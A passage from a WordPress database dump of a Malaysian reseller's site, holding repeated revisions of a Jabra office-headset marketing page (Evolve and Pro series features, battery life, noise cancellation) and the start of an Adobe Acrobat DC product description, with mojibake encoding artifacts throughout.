<li><strong>Jabra Evolve 80Â Â <img class=\"alignnone  wp-image-2453\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Jabra-Evolve-80.png\" alt=\"\" width=\"131\" height=\"150\" /></strong></li>\r\n</ol>\r\nThe best headset for concentration in the open office.\r\n<ul>\r\n 	<li>Boost your concentration</li>\r\n</ul>\r\n<h3 class=\"f-headline\"><i class=\"f-icon icon icon__active-noise-cancelation\"></i>Active noise cancellation</h3>\r\nEliminate unwanted low-frequency background noise at the touch of a button. This lets you stay focused even in noisy office environments.\r\n<h3 class=\"f-headline\"><i class=\"f-icon icon icon__all-day-comfort\"></i>Passive Noise Cancellation</h3>\r\nSimply wear the headset to eliminate high-frequency noise, such as human voices - all thanks to the specially designed ear cushions. We call this â€œpassive noise cancellation.â€\r\n<ul>\r\n 	<li>Shut out office noise and increase your productivityYou can switch on active noise cancellation to virtually eliminate low-frequency sounds, like the hum of air conditioning. Active noise cancellation uses advanced microphones to monitor and counter ambient noise</li>\r\n 	<li>Busy lightThe special â€œbusy lightâ€ turns red to let people know when youâ€™re on the phone. You can also turn it on manually when you donâ€™t want to be disturbed.</li>\r\n 	<li>Works with All Mobile Devices\r\nWorks straight out of the box with all leading UC systems and the the 3.5mm jack lets you connect to a PC, smartphone, tablet, or any other personal device.</li>\r\n 	<li>Intelligent Call Transfer\r\nIs your meeting running over? Easily transfer your Skype for Business call before you leave the office. Disconnect the 3.5mm jack and plug it into the smartphone. Your call will be instantly transferred.</li>\r\n</ul>\r\n2.Â <strong>Jabra Evolve 75Â Â <img class=\"alignnone  wp-image-2454\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Jabra-Evolve-75.png\" alt=\"\" width=\"124\" height=\"141\" /></strong>\r\n\r\nThe best wireless headset for concentration in the open office.\r\n<ul>\r\n 	<li>Outstanding sound for calls and music\r\nWorld-class speakers and HD voice for crystal-clear calls and music</li>\r\n 	<li>Shut out office noise and increase your productivity\r\nYou can switch on active noise cancellation to virtually eliminate low-frequency sounds, like the hum of air conditioning. Active noise cancellation uses advanced microphones to monitor and counter ambient noise</li>\r\n 	<li>Reduce noise and interruptions\r\nSuperior ANC and integrated busylight acts as a â€˜do not disturbâ€™ sign to enhance productivity</li>\r\n</ul>\r\n3.Â <strong>Jabra Evolve 65tÂ Â <img class=\"alignnone  wp-image-2455\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Jabra-Evolve-65t-.png\" alt=\"\" width=\"153\" height=\"175\" /></strong>\r\n\r\nEngineered to be the worldâ€™s first UC-certified true wireless earbuds.\r\n<ul>\r\n 	<li>Professional-grade sound. True wireless earbuds.\r\nSuperior true wireless call quality with 4-microphone technology. Skype for Business and UC-certified for professional sound on the go, 100% free of wires.</li>\r\n 	<li>Blocks out disruptive background noise\r\nMultiple fitting options provide a snug in-ear fit that seals out sound, giving Passive Noise Cancellation to help you focus</li>\r\n 	<li>All-day power. Always connected.\r\nUp to 5 hours battery on a single charge, 15 hours with the included pocket-friendly charging case. Simultaneously connects to two devices at the same time.</li>\r\n</ul>\r\n4.Â <strong>Jabra Pro 9400 Duo &amp; MonoÂ Â <img class=\"alignnone  wp-image-2456\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Jabra-Pro-9400-Duo-Mono.png\" alt=\"\" width=\"129\" height=\"138\" /></strong>\r\n\r\nA wireless headset that enables employees to take calls from their mobile, desk and softphone all with one headset.\r\n<ul>\r\n 	<li>True wireless freedom\r\nWireless DECT technology lets you roam up to 150 meters/450 feet away from your desk without dropping the call. Answer and end calls remotely while multitasking around the office. With up to 10 hours of battery life, you wonâ€™t need to worry about running out of charge.</li>\r\n 	<li>DECT security compliant\r\nCompliant with the latest security requirements of the DECT standard, designed to safeguard against eavesdropping. The Jabra-patented headset-to-base pairing process avoids risky pairing over the air to protect your conversations.</li>\r\n 	<li>Outstanding sound quality\r\nIf you talk and listen for a living, clear conversations can make or break a deal. Get best-in-class noise cancellation and acoustic protection. Your calls will sound great - even in the noisiest of offices</li>\r\n</ul>\r\n5.Â <strong>Jabra Evolve 75eÂ Â <img class=\"alignnone  wp-image-2457\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Jabra-Evolve-75e.png\" alt=\"\" width=\"117\" height=\"133\" /></strong>\r\n\r\nEngineered to be the worldâ€™s first professional UC-certified wireless earbuds.\r\n<ul>\r\n 	<li>Skype for Business and Jabber certified wireless earbuds</li>\r\n 	<li>ANC and integrated busylight</li>\r\n 	<li>Fully charged in just 2 hours &amp; up to 14 hours of battery</li>\r\n</ul>\r\nTo discover more about office headset, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2018-12-18 21:22:32','2018-12-18 13:22:32','',1532,'https://bintara.com.my/blog/2018/12/18/1532-revision-v1/',0,'revision','',0),(2223,1,'2018-12-16 22:47:31','2018-12-16 14:47:31','<h2>Jabra. Sound thatâ€™s engineered for you</h2>\r\nWe engineer true wireless earbuds offering you total freedom; noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity; and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.\r\n\r\nWith Jabra, you know that you are getting the best products on the market. They are engineered to be so.\r\n<h1>OFFICE HEADSETS</h1>\r\nFor PCs, Mobiles and Telephones.\r\n\r\nOur headphones and headsets are the perfect sound solutions for the office, the commute, the gym, or being out in the elements â€“ whatever you need, wherever you need it, we have world-class products to meet your demands.\r\n<h2>Our Recommended Office Headsets</h2>\r\n<ol>\r\n 	<li><strong>Jabra Evolve 80Â Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-80/v3-Refresh/Evolve_80_1.png\" width=\"163\" height=\"185\" /></strong></li>\r\n</ol>\r\nThe best headset for concentration in the open office.\r\n<ul>\r\n 	<li>Boost your concentration</li>\r\n</ul>\r\n<h3 class=\"f-headline\"><i class=\"f-icon icon icon__active-noise-cancelation\"></i>Active noise cancellation</h3>\r\nEliminate unwanted low-frequency background noise at the touch of a button. This lets you stay focused even in noisy office environments.\r\n<h3 class=\"f-headline\"><i class=\"f-icon icon icon__all-day-comfort\"></i>Passive Noise Cancellation</h3>\r\nSimply wear the headset to eliminate high-frequency noise, such as human voices - all thanks to the specially designed ear cushions. We call this â€œpassive noise cancellation.â€\r\n<ul>\r\n 	<li>Shut out office noise and increase your productivity\r\n\r\nYou can switch on active noise cancellation to virtually eliminate low-frequency sounds, like the hum of air conditioning. Active noise cancellation uses advanced microphones to monitor and counter ambient noise</li>\r\n 	<li>Busy light\r\n\r\nThe special â€œbusy lightâ€ turns red to let people know when youâ€™re on the phone. You can also turn it on manually when you donâ€™t want to be disturbed.</li>\r\n 	<li>Works with All Mobile Devices\r\nWorks straight out of the box with all leading UC systems and the the 3.5mm jack lets you connect to a PC, smartphone, tablet, or any other personal device.</li>\r\n 	<li>Intelligent Call Transfer\r\nIs your meeting running over? Easily transfer your Skype for Business call before you leave the office. Disconnect the 3.5mm jack and plug it into the smartphone. Your call will be instantly transferred.</li>\r\n</ul>\r\n2.Â <strong>Jabra Evolve 75Â Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-75/V1/Slider/EV75_2.png\" width=\"123\" height=\"141\" /></strong>\r\n\r\nThe best wireless headset for concentration in the open office.\r\n<ul>\r\n 	<li>Outstanding sound for calls and music\r\nWorld-class speakers and HD voice for crystal-clear calls and music</li>\r\n 	<li>Shut out office noise and increase your productivity\r\nYou can switch on active noise cancellation to virtually eliminate low-frequency sounds, like the hum of air conditioning. Active noise cancellation uses advanced microphones to monitor and counter ambient noise</li>\r\n 	<li>Reduce noise and interruptions\r\nSuperior ANC and integrated busylight acts as a â€˜do not disturbâ€™ sign to enhance productivity</li>\r\n</ul>\r\n3.Â <strong>Jabra Evolve 65tÂ Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-65t/V4/TopBanner/Slider/1.png\" width=\"169\" height=\"193\" /></strong>\r\n\r\nEngineered to be the worldâ€™s first UC-certified true wireless earbuds.\r\n<ul>\r\n 	<li>Professional-grade sound. True wireless earbuds.\r\nSuperior true wireless call quality with 4-microphone technology. Skype for Business and UC-certified for professional sound on the go, 100% free of wires.</li>\r\n 	<li>Blocks out disruptive background noise\r\nMultiple fitting options provide a snug in-ear fit that seals out sound, giving Passive Noise Cancellation to help you focus</li>\r\n 	<li>All-day power. Always connected.\r\nUp to 5 hours battery on a single charge, 15 hours with the included pocket-friendly charging case. Simultaneously connects to two devices at the same time.</li>\r\n</ul>\r\n4.Â <strong>Jabra Pro 9400 Duo &amp; MonoÂ Â <img class=\"\" src=\"https://assets.jabra.com/e/d/4/b/ed4b6f1a58e2a92d97feb85f65698349acb8e4ee_PI_Jabra_Pro_9450_Duo_Flex_Headband_in_Base_CMYK_Jabra_Pro_9450_Duo_0001_PI_Jabra_PRO_9450_Duo_.png?w=487&amp;h=525\" width=\"146\" height=\"157\" /></strong>\r\n\r\nA wireless headset that enables employees to take calls from their mobile, desk and softphone all with one headset.\r\n<ul>\r\n 	<li>True wireless freedom\r\nWireless DECT technology lets you roam up to 150 meters/450 feet away from your desk without dropping the call. Answer and end calls remotely while multitasking around the office. With up to 10 hours of battery life, you wonâ€™t need to worry about running out of charge.</li>\r\n 	<li>DECT security compliant\r\nCompliant with the latest security requirements of the DECT standard, designed to safeguard against eavesdropping. The Jabra-patented headset-to-base pairing process avoids risky pairing over the air to protect your conversations.</li>\r\n 	<li>Outstanding sound quality\r\nIf you talk and listen for a living, clear conversations can make or break a deal. Get best-in-class noise cancellation and acoustic protection. Your calls will sound great - even in the noisiest of offices</li>\r\n</ul>\r\n5.Â <strong>Jabra Evolve 75eÂ Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-75e/V1/Slider/01_Jabra_Evolve_75e_top.png\" alt=\"Jabra Evolve 75e\" width=\"152\" height=\"173\" /></strong>\r\n\r\nEngineered to be the worldâ€™s first professional UC-certified wireless earbuds.\r\n<ul>\r\n 	<li>Skype for Business and Jabber certified wireless earbuds</li>\r\n 	<li>ANC and integrated busylight</li>\r\n 	<li>Fully charged in just 2 hours &amp; up to 14 hours of battery</li>\r\n</ul>\r\nTo discover more about office headset, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2018-12-16 22:47:31','2018-12-16 14:47:31','',1532,'https://bintara.com.my/blog/2018/12/16/1532-revision-v1/',0,'revision','',0),(2224,1,'2018-12-16 22:48:22','2018-12-16 14:48:22','<h2>Jabra. Sound thatâ€™s engineered for you</h2>\r\nWe engineer true wireless earbuds offering you total freedom; noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity; and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.\r\n\r\nWith Jabra, you know that you are getting the best products on the market. They are engineered to be so.\r\n<h1>OFFICE HEADSETS</h1>\r\nFor PCs, Mobiles and Telephones.\r\n\r\nOur headphones and headsets are the perfect sound solutions for the office, the commute, the gym, or being out in the elements â€“ whatever you need, wherever you need it, we have world-class products to meet your demands.\r\n<h2>Our Recommended Office Headsets</h2>\r\n<ol>\r\n 	<li><strong>Jabra Evolve 80Â Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-80/v3-Refresh/Evolve_80_1.png\" width=\"163\" height=\"185\" /></strong></li>\r\n</ol>\r\nThe best headset for concentration in the open office.\r\n<ul>\r\n 	<li>Boost your concentration</li>\r\n</ul>\r\n<h3 class=\"f-headline\"><i class=\"f-icon icon icon__active-noise-cancelation\"></i>Active noise cancellation</h3>\r\nEliminate unwanted low-frequency background noise at the touch of a button. This lets you stay focused even in noisy office environments.\r\n<h3 class=\"f-headline\"><i class=\"f-icon icon icon__all-day-comfort\"></i>Passive Noise Cancellation</h3>\r\nSimply wear the headset to eliminate high-frequency noise, such as human voices - all thanks to the specially designed ear cushions. We call this â€œpassive noise cancellation.â€\r\n<ul>\r\n 	<li>Shut out office noise and increase your productivityYou can switch on active noise cancellation to virtually eliminate low-frequency sounds, like the hum of air conditioning. Active noise cancellation uses advanced microphones to monitor and counter ambient noise</li>\r\n 	<li>Busy lightThe special â€œbusy lightâ€ turns red to let people know when youâ€™re on the phone. You can also turn it on manually when you donâ€™t want to be disturbed.</li>\r\n 	<li>Works with All Mobile Devices\r\nWorks straight out of the box with all leading UC systems and the the 3.5mm jack lets you connect to a PC, smartphone, tablet, or any other personal device.</li>\r\n 	<li>Intelligent Call Transfer\r\nIs your meeting running over? Easily transfer your Skype for Business call before you leave the office. Disconnect the 3.5mm jack and plug it into the smartphone. Your call will be instantly transferred.</li>\r\n</ul>\r\n2.Â <strong>Jabra Evolve 75Â Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-75/V1/Slider/EV75_2.png\" width=\"123\" height=\"141\" /></strong>\r\n\r\nThe best wireless headset for concentration in the open office.\r\n<ul>\r\n 	<li>Outstanding sound for calls and music\r\nWorld-class speakers and HD voice for crystal-clear calls and music</li>\r\n 	<li>Shut out office noise and increase your productivity\r\nYou can switch on active noise cancellation to virtually eliminate low-frequency sounds, like the hum of air conditioning. Active noise cancellation uses advanced microphones to monitor and counter ambient noise</li>\r\n 	<li>Reduce noise and interruptions\r\nSuperior ANC and integrated busylight acts as a â€˜do not disturbâ€™ sign to enhance productivity</li>\r\n</ul>\r\n3.Â <strong>Jabra Evolve 65tÂ Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-65t/V4/TopBanner/Slider/1.png\" width=\"169\" height=\"193\" /></strong>\r\n\r\nEngineered to be the worldâ€™s first UC-certified true wireless earbuds.\r\n<ul>\r\n 	<li>Professional-grade sound. True wireless earbuds.\r\nSuperior true wireless call quality with 4-microphone technology. Skype for Business and UC-certified for professional sound on the go, 100% free of wires.</li>\r\n 	<li>Blocks out disruptive background noise\r\nMultiple fitting options provide a snug in-ear fit that seals out sound, giving Passive Noise Cancellation to help you focus</li>\r\n 	<li>All-day power. Always connected.\r\nUp to 5 hours battery on a single charge, 15 hours with the included pocket-friendly charging case. Simultaneously connects to two devices at the same time.</li>\r\n</ul>\r\n4.Â <strong>Jabra Pro 9400 Duo &amp; MonoÂ Â <img class=\"\" src=\"https://assets.jabra.com/e/d/4/b/ed4b6f1a58e2a92d97feb85f65698349acb8e4ee_PI_Jabra_Pro_9450_Duo_Flex_Headband_in_Base_CMYK_Jabra_Pro_9450_Duo_0001_PI_Jabra_PRO_9450_Duo_.png?w=487&amp;h=525\" width=\"146\" height=\"157\" /></strong>\r\n\r\nA wireless headset that enables employees to take calls from their mobile, desk and softphone all with one headset.\r\n<ul>\r\n 	<li>True wireless freedom\r\nWireless DECT technology lets you roam up to 150 meters/450 feet away from your desk without dropping the call. Answer and end calls remotely while multitasking around the office. With up to 10 hours of battery life, you wonâ€™t need to worry about running out of charge.</li>\r\n 	<li>DECT security compliant\r\nCompliant with the latest security requirements of the DECT standard, designed to safeguard against eavesdropping. The Jabra-patented headset-to-base pairing process avoids risky pairing over the air to protect your conversations.</li>\r\n 	<li>Outstanding sound quality\r\nIf you talk and listen for a living, clear conversations can make or break a deal. Get best-in-class noise cancellation and acoustic protection. Your calls will sound great - even in the noisiest of offices</li>\r\n</ul>\r\n5.Â <strong>Jabra Evolve 75eÂ Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-75e/V1/Slider/01_Jabra_Evolve_75e_top.png\" alt=\"Jabra Evolve 75e\" width=\"152\" height=\"173\" /></strong>\r\n\r\nEngineered to be the worldâ€™s first professional UC-certified wireless earbuds.\r\n<ul>\r\n 	<li>Skype for Business and Jabber certified wireless earbuds</li>\r\n 	<li>ANC and integrated busylight</li>\r\n 	<li>Fully charged in just 2 hours &amp; up to 14 hours of battery</li>\r\n</ul>\r\nTo discover more about office headset, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2018-12-16 22:48:22','2018-12-16 14:48:22','',1532,'https://bintara.com.my/blog/2018/12/16/1532-revision-v1/',0,'revision','',0),(2861,1,'2019-02-07 16:38:22','2019-02-07 08:38:22','<h2>Jabra.</h2><h3>Sound thatâ€™s engineered for you</h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.</p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.</p><h2>Jabra Evolve Series</h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office</h3>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve.jpg 585w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Better concentration, greater productivity</h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.</p><ul><li>World-class speakers to deliver amazing sound for calls and music.</li><li>Call-management features allow for incredible ease-of-use..</li><li>Compatible with all leading UC platforms.</li></ul><h3>Jabra Evolve 65t</h3><p>The Jabra Evolve 65t are the worldâ€™s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGelsâ„¢ for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_80.png\" alt=\"\" />											\n		<h3>Jabra Evolve 80</h3><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><h3>Jabra Evolve 75e</h3><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation â€“ but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Evolve75e.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\" alt=\"\" />											\n		<h3>Jabra Evolve 75</h3><p>Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise â€“ and need mobility around the workspace. Move up to 100ft/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><h3>Jabra Evolve 65 Stereo / Mono</h3><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_65.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\" alt=\"\" />											\n		<h3>Jabra Evolve 40 Stereo / Mono</h3><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><h3>Jabra Evolve 30 Stereo / Mono</h3><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.</p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_30_.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" />											\n		<h3>Jabra Evolve 20 Stereo / Mono</h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p>','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2019-02-07 16:38:22','2019-02-07 08:38:22','',1532,'https://bintara.com.my/blog/2019/02/07/1532-revision-v1/',0,'revision','',0),(2862,1,'2019-02-07 16:41:59','2019-02-07 08:41:59','[vfb id=12]','Get Quotation (Jabra Evolve)','','publish','closed','closed','','get-quotation-jabra-evolve','','','2019-02-07 16:42:16','2019-02-07 08:42:16','',0,'https://bintara.com.my/?page_id=2862',0,'page','',0),(2453,1,'2018-12-18 21:19:14','2018-12-18 13:19:14','','Jabra Evolve 80','','inherit','closed','closed','','jabra-evolve-80','','','2018-12-18 21:19:14','2018-12-18 13:19:14','',1532,'https://bintara.com.my/wp-content/uploads/2018/12/Jabra-Evolve-80.png',0,'attachment','image/png',0),(2227,1,'2018-12-16 22:52:25','2018-12-16 14:52:25','<h2>Jabra. Sound thatâ€™s engineered for you</h2>\r\nWe engineer true wireless earbuds offering you total freedom; noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity; and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.\r\n\r\nWith Jabra, you know that you are getting the best products on the market. They are engineered to be so.\r\n<h2>OFFICE HEADSETS</h2>\r\nFor PCs, Mobiles and Telephones.\r\n\r\nOur headphones and headsets are the perfect sound solutions for the office, the commute, the gym, or being out in the elements â€“ whatever you need, wherever you need it, we have world-class products to meet your demands.\r\n<h3>Our Recommended Office Headsets</h3>\r\n<ol>\r\n 	<li><strong>Jabra Evolve 80Â Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-80/v3-Refresh/Evolve_80_1.png\" width=\"163\" height=\"185\" /></strong></li>\r\n</ol>\r\nThe best headset for concentration in the open office.\r\n<ul>\r\n 	<li>Boost your concentration</li>\r\n</ul>\r\n<h3 class=\"f-headline\"><i class=\"f-icon icon icon__active-noise-cancelation\"></i>Active noise cancellation</h3>\r\nEliminate unwanted low-frequency background noise at the touch of a button. This lets you stay focused even in noisy office environments.\r\n<h3 class=\"f-headline\"><i class=\"f-icon icon icon__all-day-comfort\"></i>Passive Noise Cancellation</h3>\r\nSimply wear the headset to eliminate high-frequency noise, such as human voices - all thanks to the specially designed ear cushions. We call this â€œpassive noise cancellation.â€\r\n<ul>\r\n 	<li>Shut out office noise and increase your productivityYou can switch on active noise cancellation to virtually eliminate low-frequency sounds, like the hum of air conditioning. Active noise cancellation uses advanced microphones to monitor and counter ambient noise</li>\r\n 	<li>Busy lightThe special â€œbusy lightâ€ turns red to let people know when youâ€™re on the phone. You can also turn it on manually when you donâ€™t want to be disturbed.</li>\r\n 	<li>Works with All Mobile Devices\r\nWorks straight out of the box with all leading UC systems and the the 3.5mm jack lets you connect to a PC, smartphone, tablet, or any other personal device.</li>\r\n 	<li>Intelligent Call Transfer\r\nIs your meeting running over? Easily transfer your Skype for Business call before you leave the office. Disconnect the 3.5mm jack and plug it into the smartphone. Your call will be instantly transferred.</li>\r\n</ul>\r\n2.Â <strong>Jabra Evolve 75Â Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-75/V1/Slider/EV75_2.png\" width=\"123\" height=\"141\" /></strong>\r\n\r\nThe best wireless headset for concentration in the open office.\r\n<ul>\r\n 	<li>Outstanding sound for calls and music\r\nWorld-class speakers and HD voice for crystal-clear calls and music</li>\r\n 	<li>Shut out office noise and increase your productivity\r\nYou can switch on active noise cancellation to virtually eliminate low-frequency sounds, like the hum of air conditioning. Active noise cancellation uses advanced microphones to monitor and counter ambient noise</li>\r\n 	<li>Reduce noise and interruptions\r\nSuperior ANC and integrated busylight acts as a â€˜do not disturbâ€™ sign to enhance productivity</li>\r\n</ul>\r\n3.Â <strong>Jabra Evolve 65tÂ Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-65t/V4/TopBanner/Slider/1.png\" width=\"169\" height=\"193\" /></strong>\r\n\r\nEngineered to be the worldâ€™s first UC-certified true wireless earbuds.\r\n<ul>\r\n 	<li>Professional-grade sound. True wireless earbuds.\r\nSuperior true wireless call quality with 4-microphone technology. Skype for Business and UC-certified for professional sound on the go, 100% free of wires.</li>\r\n 	<li>Blocks out disruptive background noise\r\nMultiple fitting options provide a snug in-ear fit that seals out sound, giving Passive Noise Cancellation to help you focus</li>\r\n 	<li>All-day power. Always connected.\r\nUp to 5 hours battery on a single charge, 15 hours with the included pocket-friendly charging case. Simultaneously connects to two devices at the same time.</li>\r\n</ul>\r\n4.Â <strong>Jabra Pro 9400 Duo &amp; MonoÂ Â <img class=\"\" src=\"https://assets.jabra.com/e/d/4/b/ed4b6f1a58e2a92d97feb85f65698349acb8e4ee_PI_Jabra_Pro_9450_Duo_Flex_Headband_in_Base_CMYK_Jabra_Pro_9450_Duo_0001_PI_Jabra_PRO_9450_Duo_.png?w=487&amp;h=525\" width=\"146\" height=\"157\" /></strong>\r\n\r\nA wireless headset that enables employees to take calls from their mobile, desk and softphone all with one headset.\r\n<ul>\r\n 	<li>True wireless freedom\r\nWireless DECT technology lets you roam up to 150 meters/450 feet away from your desk without dropping the call. Answer and end calls remotely while multitasking around the office. With up to 10 hours of battery life, you wonâ€™t need to worry about running out of charge.</li>\r\n 	<li>DECT security compliant\r\nCompliant with the latest security requirements of the DECT standard, designed to safeguard against eavesdropping. The Jabra-patented headset-to-base pairing process avoids risky pairing over the air to protect your conversations.</li>\r\n 	<li>Outstanding sound quality\r\nIf you talk and listen for a living, clear conversations can make or break a deal. Get best-in-class noise cancellation and acoustic protection. Your calls will sound great - even in the noisiest of offices</li>\r\n</ul>\r\n5.Â <strong>Jabra Evolve 75eÂ Â <img class=\"\" src=\"https://www.jabra.com/-/media/Images/Products/Jabra-Evolve-75e/V1/Slider/01_Jabra_Evolve_75e_top.png\" alt=\"Jabra Evolve 75e\" width=\"152\" height=\"173\" /></strong>\r\n\r\nEngineered to be the worldâ€™s first professional UC-certified wireless earbuds.\r\n<ul>\r\n 	<li>Skype for Business and Jabber certified wireless earbuds</li>\r\n 	<li>ANC and integrated busylight</li>\r\n 	<li>Fully charged in just 2 hours &amp; up to 14 hours of battery</li>\r\n</ul>\r\nTo discover more about office headset, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2018-12-16 22:52:25','2018-12-16 14:52:25','',1532,'https://bintara.com.my/blog/2018/12/16/1532-revision-v1/',0,'revision','',0),(2229,1,'2018-12-17 09:22:21','2018-12-17 01:22:21','&nbsp;\r\n\r\n<img class=\" wp-image-1696\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Logo-Adobe-1.jpg\" alt=\"Logo Adobe\" width=\"417\" height=\"277\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software, mobile scan app, signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\"><strong>Acrobat Pro or Acrobat Standard desktop software</strong> â€” including future feature updates, quarterly security enhancements &amp; improvements.</span></li>\r\n 	<li class=\"text-3-block\"><strong>Adobe Document Cloud services</strong>Â <span class=\"text-light\">â€”</span> complete essential PDF tasks with the Acrobat Reader mobile appÂ or in web browser, including storing &amp; sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\"><strong>Adobe Sign subscription</strong>Â â€” a swipe-and-tap solution to collect, sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div 